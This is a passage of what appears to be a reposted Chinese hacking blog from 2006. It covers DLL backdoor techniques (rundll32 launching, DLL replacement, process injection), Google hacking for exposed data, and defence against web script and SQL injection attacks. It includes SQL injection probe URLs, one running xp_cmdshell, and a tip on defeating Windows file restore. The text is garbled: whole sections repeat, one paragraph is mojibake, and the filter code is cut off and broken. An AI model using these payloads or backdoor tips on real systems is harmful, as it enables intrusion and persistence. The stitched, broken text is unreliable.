這類後門很簡單,只把自己做成一個DLL文件,在註冊表Run鍵值或其他可以被系統自動加載的地方,使用Rundll32.exe來自動啟動。Rundll32.exe是什麼?顧名思意,"執行32位的DLL文件"。它的作用是執行DLL文件中的內部函數,這樣在進程當中,只會有Rundll32.exe,而不會有DLL後門的進程,這樣,就實現了進程上的隱藏。如果看到系統中有多個Rundll32.exe,不必驚慌,這證明用Rundll32.exe啟動了多少個的DLL文件。當然,這些Rundll32.exe執行的DLL文件是什麼,我們都可以從系統自動加載的地方找到。
現在,我來介紹一下Rundll32.exe這個文件,意思上邊已經說過,功能就是以命令行的方式調用動態鏈接程序庫。系統中還有一個Rundll.exe文件,他的意思是"執行16位的DLL文件",這裡要注意一下。在來看看Rundll32.exe使用的函數原型:
其命令行下的使用方法為:Rundll32.exe DLLname,Functionname [Arguments]
Void CALLBACK FunctionName (
HWND hwnd,
HINSTANCE hinst,
LPTSTR lpCmdLine,
Int nCmdShow
);
DLLname為需要執行的DLL文件名;Functionname為前邊需要執行的DLL文件的具體引出函數;[Arguments]為引出函數的具體參數。
(2),替換系統中的DLL文件
這類後門就比上邊的先進了一些,它把實現了後門功能的代碼做成一個和系統匹配的DLL文件,並把原來的DLL文件改名。遇到應用程序請求原來的DLL文件時, DLL後門就啟一個轉發的作用,把"參數"傳遞給原來的DLL文件;如果遇到特殊的請求時(比如客戶端),DLL後門就開始,啟動並運行了。對於這類後門,把所有操作都在DLL文件中實現最為安全,但需要的編程知識也非常多,也非常不容易編寫。所以,這類後門一般都是把DLL文件做成一個"啟動"文件,在遇到特殊的情況下(比如客戶端的請求),就啟動一個普通的EXE後門;在客戶端結束連接之後,把EXE後門停止,然後DLL文件進入"休息"狀態,在下次客戶端連接之前,都不會啟動。但隨著微軟的"數字簽名"和"文件恢復"的功能出台,這種後門已經逐步衰落。
提示:
在WINNT\system32目錄下,有一個dllcache文件夾,裡邊存放著眾多DLL文件(也包括一些重要的EXE文件),在DLL文件被非法修改之後,系統就從這裡來恢復被修改的DLL文件。如果要修改某個DLL文件,首先應該把dllcache目錄下的同名DLL文件刪除或更名,否則系統會自動恢復。
(3),動態嵌入式
這才是DLL後門最常用的方法。其意義是將DLL文件嵌入到正在運行的系統進程當中。在Windows系統中,每個進程都有自己的私有內存空間,但還是有種種方法來進入其進程的私有內存空間,來實現動態嵌入式。由於系統的關鍵進程是不能終止的,所以這類後門非常隱蔽,查殺也非常困難。常見的動態嵌入式有:"掛接API""全局鉤子(HOOK)""遠程線程"等。
- Nov 26 Sun 2006 11:41
<Hackbase>怎樣使用Google黑掉Windows服務器
在我的《為什麼使用Google掃瞄安全漏洞》的技巧中,我討論了如何使用Google.com來執行對你的面向公眾的服務器的安全掃瞄--包括Windows、IIS、Apache和(但願不會如此!)SQL Server。你能使用它得到服務器的信息、包含敏感信息的文件和檢測出「暗藏的」登錄頁、服務器日誌文件,以及很多其它的東西。而在這個技巧中,我將描述一些極好的Google工具,和基本的Google查詢,幫助你搜索那些你還沒有意識到,但能夠被公眾獲取的敏感信息。
為什麼使用Google掃瞄安全漏洞
如果你正在執行信息安全評估--滲入測試、漏洞評估,或者範圍更廣的黑客測試--你就不能沒有一個相應的測試工具。雖然對於一個網站來說,此類工具很難找,但Google(是的,www.google.com)還是一個你可以使用的,能夠測試Windows系統安全漏洞的最熱工具中的其中之一。假設它的功能和力量能夠被用來攻擊你,那麼在對你的惡意攻擊之前,這是一個讓你知道自己系統漏洞,並採取相應保護措施的好工具。
除了能夠用Google做你能做的事情之外,它的最大優勢之一就是不存在價格上的問題。Google被認為是窮人的安全評估工具,或者是為那些很少,甚至沒有IT預算的安全管理員(即幾乎所有的人)提供的工具。我個人是商業安全評估工具的大力提倡者,它們有助於提供更加詳盡的測試項目、優良的報告能力和其它可以使你的評估工作更加容易的工具。然而,「花多少錢辦多少事」,有時和它們並不相符。Google能夠提供像黑客一樣的眼睛,做你想像不到的事情,或者能夠做任何安全測試工具(包括商業軟件、免費軟件或開源軟件)能夠做的事情,而這一切都是免費的!
和許多外部測試工具一樣,Google能夠看到當前你為網絡世界提供的服務。並且,它能夠搜集、緩存、尋找和挖掘那些對你來說並不是很新的信息,或者在你不知道的情況下放上互聯網的內容。在執行安全評估查詢方面,你可以有幾個選擇,在Google的首頁,高級搜索頁面,甚至使用Google API寫一個你自己的Web應用程序。
當在你的系統上執行信息安全測試時,你最想做的就使像黑客一樣進行查看,這也是Google最為擅長的。這裡是一些進行黑客測試時Google能夠找到的信息的例子:
1.信用卡信息(credit card information)、社會安全號(social security number)和其它公眾可以通過Web應用程序和數據庫訪問的機密信息。
2.網絡攝像頭。
3.文字處理文檔、電子錶格和演示文稿文件。
4.Outlook Web Access相關的文件。
5.默認的(通常是不安全的)IIS文件和自定義的ISS錯誤信息。
6.本想隱藏的Web登錄頁面。
7.進行不屬於你的網絡的主機欺詐。
8.包含敏感信息的新聞組帖子。
以上述的最後一個為例,當在Google Groups中執行一個基本的查詢時,我看到了一個我認識的電信供應商的支持組信息,它是由供應商的網絡管理員發表的。那個帖子洩漏了供應商內部網絡的詳細配置,包括網絡佈局、內網IP地址和主機名。它顯露出的這麼多信息給我的第一感覺是,我不應該信息那個公司,並將自己企業的敏感信息交給他們。我使用公司的名稱和幾個關鍵詞,執行簡單的搜索就找到了這些信息,若是使用Google的高級搜索,還不知道能夠找到多少信息呢!
在今天高價漏洞評估工具的世界裡,Google是一陣清新的空氣,它的安全測試查詢是無敵的!作為一個安全漏洞檢測的頂級人士,你不僅需要像黑客一樣進行工作,還需要有創新的測試方法,Google無疑就是這樣一款工具,他允許你進行這樣的工作。
在不久的將來,我將向你講述使用真實的Google查詢測試你的Windows系統的安全,這將幫助你確定自己的Windows系統是否足夠健壯。
用Google工具自動執行黑客測試
已經有多種Google工具能夠自動執行黑客測試,或者增強Google黑客測試的能力,它們包括:
·Johnny Long的Google Hacking Database (GHDB):http://johnny.ihackstuff.com/index.php?module=prodreviews,提供許多查詢樣例,你可以調節這些樣例,將其用於你自己的站點或域名上。
·Foundstone公司的SiteDigger(http://www.foundstone.com/resources/proddesc/sitedigger.htm),它利用Foundstone自己個性化的Google查詢,像Johnny Long的Google Hacking Database (GHDB)一樣執行自動搜索。
注意:Google每天最多只允許運行1,000條查詢,這看起來挺多,但對於此類工具來說,很快就能夠執行完畢。
·Johnny Long的Gooscan for Linux(http://johnny.ihackstuff.com/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5),它能夠用來在Linux下執行命令行方式的Google查詢。
·Google Toolbar for Internet Explorer允許你不進入Google的首頁www.google.com就能夠在IE瀏覽器中直接輸入關鍵詞進行簡單的查詢。如果你是IE的反對者,還可以使用能夠在Netscape或者Mozilla Firefox下執行的開放源碼的Googlebar(http://googlebar.mozdev.org/)。
·GooDelete(_history.htm">http://www.dirfile.com/goodelete_history.htm)能夠清理那些你不想留下的,使用Google Toolbar查詢留下的,可能包含敏感信息的緩存。
另外,如果你非常熱心於Google黑客行為,你的書櫥中就不能少了Johnny Long撰寫的,具有很高評價的《Google Hacking for Penetration Testers.》(_ihackstuff-20/102-5005443-2664941?v=glance&s=books">http://www.amazon.com/exec/obidos/tg/detail/-/1931836361/ref=ase_ihackstuff-20/102-5005443-2664941?v=glance&s=books)這本書。
為什麼使用Google掃瞄安全漏洞
如果你正在執行信息安全評估--滲入測試、漏洞評估,或者範圍更廣的黑客測試--你就不能沒有一個相應的測試工具。雖然對於一個網站來說,此類工具很難找,但Google(是的,www.google.com)還是一個你可以使用的,能夠測試Windows系統安全漏洞的最熱工具中的其中之一。假設它的功能和力量能夠被用來攻擊你,那麼在對你的惡意攻擊之前,這是一個讓你知道自己系統漏洞,並採取相應保護措施的好工具。
除了能夠用Google做你能做的事情之外,它的最大優勢之一就是不存在價格上的問題。Google被認為是窮人的安全評估工具,或者是為那些很少,甚至沒有IT預算的安全管理員(即幾乎所有的人)提供的工具。我個人是商業安全評估工具的大力提倡者,它們有助於提供更加詳盡的測試項目、優良的報告能力和其它可以使你的評估工作更加容易的工具。然而,「花多少錢辦多少事」,有時和它們並不相符。Google能夠提供像黑客一樣的眼睛,做你想像不到的事情,或者能夠做任何安全測試工具(包括商業軟件、免費軟件或開源軟件)能夠做的事情,而這一切都是免費的!
和許多外部測試工具一樣,Google能夠看到當前你為網絡世界提供的服務。並且,它能夠搜集、緩存、尋找和挖掘那些對你來說並不是很新的信息,或者在你不知道的情況下放上互聯網的內容。在執行安全評估查詢方面,你可以有幾個選擇,在Google的首頁,高級搜索頁面,甚至使用Google API寫一個你自己的Web應用程序。
當在你的系統上執行信息安全測試時,你最想做的就使像黑客一樣進行查看,這也是Google最為擅長的。這裡是一些進行黑客測試時Google能夠找到的信息的例子:
1.信用卡信息(credit card information)、社會安全號(social security number)和其它公眾可以通過Web應用程序和數據庫訪問的機密信息。
2.網絡攝像頭。
3.文字處理文檔、電子錶格和演示文稿文件。
4.Outlook Web Access相關的文件。
5.默認的(通常是不安全的)IIS文件和自定義的ISS錯誤信息。
6.本想隱藏的Web登錄頁面。
7.進行不屬於你的網絡的主機欺詐。
8.包含敏感信息的新聞組帖子。
以上述的最後一個為例,當在Google Groups中執行一個基本的查詢時,我看到了一個我認識的電信供應商的支持組信息,它是由供應商的網絡管理員發表的。那個帖子洩漏了供應商內部網絡的詳細配置,包括網絡佈局、內網IP地址和主機名。它顯露出的這麼多信息給我的第一感覺是,我不應該信息那個公司,並將自己企業的敏感信息交給他們。我使用公司的名稱和幾個關鍵詞,執行簡單的搜索就找到了這些信息,若是使用Google的高級搜索,還不知道能夠找到多少信息呢!
在今天高價漏洞評估工具的世界裡,Google是一陣清新的空氣,它的安全測試查詢是無敵的!作為一個安全漏洞檢測的頂級人士,你不僅需要像黑客一樣進行工作,還需要有創新的測試方法,Google無疑就是這樣一款工具,他允許你進行這樣的工作。
在不久的將來,我將向你講述使用真實的Google查詢測試你的Windows系統的安全,這將幫助你確定自己的Windows系統是否足夠健壯。
用Google工具自動執行黑客測試
已經有多種Google工具能夠自動執行黑客測試,或者增強Google黑客測試的能力,它們包括:
·Johnny Long的Google Hacking Database (GHDB):http://johnny.ihackstuff.com/index.php?module=prodreviews,提供許多查詢樣例,你可以調節這些樣例,將其用於你自己的站點或域名上。
·Foundstone公司的SiteDigger(http://www.foundstone.com/resources/proddesc/sitedigger.htm),它利用Foundstone自己個性化的Google查詢,像Johnny Long的Google Hacking Database (GHDB)一樣執行自動搜索。
注意:Google每天最多只允許運行1,000條查詢,這看起來挺多,但對於此類工具來說,很快就能夠執行完畢。
·Johnny Long的Gooscan for Linux(http://johnny.ihackstuff.com/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5),它能夠用來在Linux下執行命令行方式的Google查詢。
·Google Toolbar for Internet Explorer允許你不進入Google的首頁www.google.com就能夠在IE瀏覽器中直接輸入關鍵詞進行簡單的查詢。如果你是IE的反對者,還可以使用能夠在Netscape或者Mozilla Firefox下執行的開放源碼的Googlebar(http://googlebar.mozdev.org/)。
·GooDelete(_history.htm">http://www.dirfile.com/goodelete_history.htm)能夠清理那些你不想留下的,使用Google Toolbar查詢留下的,可能包含敏感信息的緩存。
另外,如果你非常熱心於Google黑客行為,你的書櫥中就不能少了Johnny Long撰寫的,具有很高評價的《Google Hacking for Penetration Testers.》(_ihackstuff-20/102-5005443-2664941?v=glance&s=books">http://www.amazon.com/exec/obidos/tg/detail/-/1931836361/ref=ase_ihackstuff-20/102-5005443-2664941?v=glance&s=books)這本書。
- Nov 26 Sun 2006 11:24
<Hackbase>網頁腳本攻擊防範全攻略
近來,網絡上的SQL Injection 漏洞利用攻擊,JS腳本,HTML腳本攻擊似乎逾演逾烈。陸續的很多站點都被此類攻擊所困擾,並非像主機漏洞那樣可以當即修復,來自於WEB的攻擊方式使我們在防範或者是修復上都帶來了很大的不便。HOOO…… 一個站長最大的痛苦莫過於此。自己的密碼如何如何強壯卻始終被攻擊者得到,但如何才能做到真正意義上的安全呢?第一,別把密碼和你的生活聯繫起來;第二,Supermaster的PWD最好只有你自己知道;第三,絕對要完善好你的網站程序。然而怎樣才能完善,這將是我們此文的最終目的。
安全防護,如何做到安全防護?想要防護就要知道對方是綰謂洩セ鰲S瀉芏轡惱露莢諦慈綰喂ハ履癡鏡悖涫燈涔セ韉耐揪兌膊還且韻錄鋼鄭?amp;nbsp;
1. 簡單的腳本攻擊
此類攻擊應該屬於無聊搗亂吧。比如****:alert(); </table>等等,由於程序上過濾的不嚴密,使攻擊者既得不到什麼可用的,但又使的他可以進行搗亂的目的。以目前很多站點的免費服務,或者是自身站點的程序上也是有過濾不嚴密的問題。
2. 危險的腳本攻擊
這類腳本攻擊已經過度到可以竊取管理員或者是其他用戶信息的程度上了。比如大家都知道的cookies竊取,利用腳本對客戶端進行本地的寫操作等等。
3. Sql Injection 漏洞攻擊
可以說,這個攻擊方式是從動網論壇和BBSXP開始的。利用SQL特殊字符過濾的不嚴密,而對數據庫進行跨表查詢的攻擊。比如:
http://127.0.0.1/forum/showuser.asp?id=999 and 1=1
http://127.0.0.1/forum/showuser.asp?id=999 and 1=2
http://127.0.0.1/forum/showuser.asp?id=999 and 0<>(select count(*) from admin)
http://127.0.0.1/forum/showuser.asp?id=999』; declare @a sysname set @a='xp_'+ 'cmdshell' exec @a 'dir c:\'---&aid=9
得到了管理員的密碼也就意味著已經控制的整站,雖然不一定能得到主機的權限,但也為這一步做了很大的鋪墊。類似的SQL Injection攻擊的方式方法很多,對不同的文件過濾不嚴密所採取的查詢方式也不同。所以說想做好一個完整的字符過濾程序不下一凡功夫是不可能的。
4. 遠程注入攻擊
某站點的所謂的過濾只是在提交表格頁上進行簡單的JS過濾。對於一般的用戶來說,你大可不必防範;對早有預謀的攻擊者來說,這樣的過濾似乎根本沒作用。我們常說的POST攻擊就是其中一例。通過遠程提交非法的信息以達到攻擊目的。
通過上面的攻擊方法的介紹,我們大致的瞭解了攻擊者的攻擊途徑,下面我們就開始重點的介紹,如何有效的防範腳本攻擊!
讓我們還是從最簡單的開始:
l. 防範腳本攻擊
JS腳本 和HTML腳本攻擊的防範其實很簡單:server.HTMLEncode(Str)完事。當然你還不要大叫,怎麼可能?你讓我把全站類似<%=uid%>都加過濾我還不累死?為了方便的過濾,我們只需要將HTML腳本和JS腳本中的幾個關鍵字符過濾掉就可以了:程序體(1)如下:
『以下是過濾函數
<%
function CHK(fqyString)
fqyString = replace(fqyString, ">", ">")
fqyString = replace(fqyString, "<", "<")
fqyString = replace(fqyString, "�", "&")
fqyString = Replace(fqyString, CHR(32), " ")
安全防護,如何做到安全防護?想要防護就要知道對方是綰謂洩セ鰲S瀉芏轡惱露莢諦慈綰喂ハ履癡鏡悖涫燈涔セ韉耐揪兌膊還且韻錄鋼鄭?amp;nbsp;
1. 簡單的腳本攻擊
此類攻擊應該屬於無聊搗亂吧。比如****:alert(); </table>等等,由於程序上過濾的不嚴密,使攻擊者既得不到什麼可用的,但又使的他可以進行搗亂的目的。以目前很多站點的免費服務,或者是自身站點的程序上也是有過濾不嚴密的問題。
2. 危險的腳本攻擊
這類腳本攻擊已經過度到可以竊取管理員或者是其他用戶信息的程度上了。比如大家都知道的cookies竊取,利用腳本對客戶端進行本地的寫操作等等。
3. Sql Injection 漏洞攻擊
可以說,這個攻擊方式是從動網論壇和BBSXP開始的。利用SQL特殊字符過濾的不嚴密,而對數據庫進行跨表查詢的攻擊。比如:
http://127.0.0.1/forum/showuser.asp?id=999 and 1=1
http://127.0.0.1/forum/showuser.asp?id=999 and 1=2
http://127.0.0.1/forum/showuser.asp?id=999 and 0<>(select count(*) from admin)
http://127.0.0.1/forum/showuser.asp?id=999』; declare @a sysname set @a='xp_'+ 'cmdshell' exec @a 'dir c:\'---&aid=9
得到了管理員的密碼也就意味著已經控制的整站,雖然不一定能得到主機的權限,但也為這一步做了很大的鋪墊。類似的SQL Injection攻擊的方式方法很多,對不同的文件過濾不嚴密所採取的查詢方式也不同。所以說想做好一個完整的字符過濾程序不下一凡功夫是不可能的。
4. 遠程注入攻擊
某站點的所謂的過濾只是在提交表格頁上進行簡單的JS過濾。對於一般的用戶來說,你大可不必防範;對早有預謀的攻擊者來說,這樣的過濾似乎根本沒作用。我們常說的POST攻擊就是其中一例。通過遠程提交非法的信息以達到攻擊目的。
通過上面的攻擊方法的介紹,我們大致的瞭解了攻擊者的攻擊途徑,下面我們就開始重點的介紹,如何有效的防範腳本攻擊!
讓我們還是從最簡單的開始:
l. 防範腳本攻擊
JS腳本 和HTML腳本攻擊的防範其實很簡單:server.HTMLEncode(Str)完事。當然你還不要大叫,怎麼可能?你讓我把全站類似<%=uid%>都加過濾我還不累死?為了方便的過濾,我們只需要將HTML腳本和JS腳本中的幾個關鍵字符過濾掉就可以了:程序體(1)如下:
『以下是過濾函數
<%
function CHK(fqyString)
fqyString = replace(fqyString, ">", ">")
fqyString = replace(fqyString, "<", "<")
fqyString = replace(fqyString, "�", "&")
fqyString = Replace(fqyString, CHR(32), " ")
[相聲系列] (1)